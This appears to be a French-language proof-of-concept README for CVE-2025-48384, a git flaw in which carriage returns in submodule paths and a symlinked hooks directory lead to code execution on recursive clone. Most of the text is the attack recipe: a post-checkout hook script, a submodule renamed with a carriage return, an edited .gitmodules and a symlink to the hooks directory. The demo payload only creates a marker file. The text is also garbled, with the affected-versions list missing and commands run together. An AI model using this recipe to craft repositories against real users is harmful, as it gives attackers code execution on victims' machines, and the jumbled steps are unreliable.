
PoC pour CVE-2025-48384
CVE-2025-48384 se présente sous la forme d'une vulnérabilité de résolution de lien incorrecte (suivi de lien) dans git. Plus précisément, les noms de fichiers contenant des retours chariot sont incorrectement analysés dans .git/config, et l'inclusion d'un lien symbolique pointant vers un exécutable de hook git situé dans un sous-module comme répertoire de hooks du sous-module peut conduire à une exécution de code arbitraire lorsque le dépôt est cloné avec git clone --recursive.
Git pour Microsoft Windows n'est pas affecté par cette vulnérabilité, laissant principalement certaines versions de git sur Linux et macOS vulnérables. Les versions concernées sont :
post-checkout pour exécuter du code lorsque le
dépôt poc est cloné de manière récursive :#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" dans .gitmodules et supprimez le chemin d'origine.ln -s .git/modules/sub/hooks sub